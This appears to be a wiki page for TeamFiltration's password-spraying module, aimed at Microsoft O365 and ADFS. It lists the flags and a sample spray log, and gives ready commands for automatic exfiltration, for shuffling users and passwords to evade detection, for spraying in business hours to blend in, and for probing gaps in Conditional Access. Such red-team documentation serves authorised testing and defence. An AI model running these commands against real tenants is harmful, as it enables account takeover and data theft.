Skip to content

Spraying

Jump to bottom
Flangvik edited this page Mar 8, 2026 · 10 revisions

TeamFiltration's spray module provides password spraying capabilities for Microsoft O365 tenants (both non-gov and gov), as well as ADFS.

   --spray       Load the spraying module

         --aad-sso             Use SecureWorks's Azure Active Directory password brute-forcing technique when spraying
         --us-cloud            When spraying companies attached to US Tenants (https://login.microsoftonline.us/)
         --time-window         Defines a time window where spraying should occur, in the military time format <12:00-19:00>
         --passwords           Path to a list of passwords, common weak-passwords will be generated if not supplied
         --seasons-only        Password generated for spraying will only be based on seasons
         --months-only         Password generated for spraying will only be based on months
         --common-only         Spray with the top 20 most common passwords
         --combo               Path to a combolist of username:password
         --exclude             Path to a list of emails to exclude from spraying
         --shuffle-passwords   Shuffle the password list before spraying
         --shuffle-users       Shuffle the target user list before spraying
         --auto-exfil          Automatically start the exfil module if a valid login is found

         --sleep-min           Minimum minutes to sleep between each full rotation of spraying default=60
         --sleep-max           Maximum minutes to sleep between each full rotation of spraying default=100
         --jitter              Seconds between each individual authentication attempt. default=0
         --push                Get Pushover notifications when valid credentials are found (requires pushover keys in config)
         --push-locked         Get Pushover notifications when a sprayed account gets locked (requires pushover keys in config)
         --force               Force the spraying to proceed even if there is less than <sleep> time since the last attempt

By default, TeamFiltration will pull and target the validated emails from the local database for password spraying. If no password list is provided using the --passwords argument, a series of commonly used passwords based on the Month, Season, and year will be automatically generated. You can also choose to generate either of them specifically using --seasons-only, --months-only, or --common-only.

[♥] TeamFiltration VX.X.X PUBLIC, created by @Flangvik at @TrustedSec
[+] Args parsed --outpath F:\Dev\skywalker --config F:\Dev\config.txt --spray
[SPRAY] 23.01.2023 06:55:24 EST Sleeping between 60-100 minutes for each round
[SPRAY] 23.01.2023 06:55:30 EST Sprayed fennec.shand@legitcorp.net:January2023          => INVALID
[SPRAY] 23.01.2023 06:55:30 EST Sprayed kylo.ren@legitcorp.net:January2023              => INVALID
[SPRAY] 23.01.2023 06:55:30 EST Sprayed luke.skywalker@legitcorp.net:January2023        => INVALID
[SPRAY] 23.01.2023 06:55:31 EST Sprayed anakin.skywalker@legitcorp.net:January2023      => INVALID
[SPRAY] 23.01.2023 06:55:31 EST Sprayed han.solo@legitcorp.net:January2023              => INVALID
[SPRAY] 23.01.2023 06:55:31 EST Sprayed john.cannon@legitcorp.net:January2023           => INVALID

When a valid set of credentials is found, TeamFiltration will store the access token in the database upon successful login. The account will also be excluded from all future spraying attempts.

This access token, together with the accompanying refresh token, is used when performing the exfiltration of data through the exfiltration module. This allows TeamFiltration to avoid creating unnecessary interactive logins when moving into the post-exploitation phase.

Conditional Access

If a valid set of credentials is found but the login attempt was blocked due to MFA or other restrictions enforced by Conditional Access, TeamFiltration will store the valid credentials in the database. When targeted in the exfiltration module, it will identify a gap in the policy(s) by brute-forcing a series of login combinations using unique combinations of Resource URI, ClientId, and Device.

Auto-Exfil

Using --auto-exfil will automatically trigger the exfiltration module as soon as a valid credential is found, without requiring manual intervention:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --spray --auto-exfil --all

Shuffle Options

To reduce detection patterns, the order of users and passwords can be randomised:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --spray --shuffle-users --shuffle-passwords

Combo List

If you have a username:password combo list, you can provide it directly instead of a separate password list:

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --spray --combo C:\combo.txt

Time Window

To restrict spraying to specific hours (e.g. business hours only, to blend in with normal traffic):

TeamFiltration.exe --outpath C:\Clients\Example\TFOutput --config myConfig.json --spray --time-window 08:00-18:00

Clone this wiki locally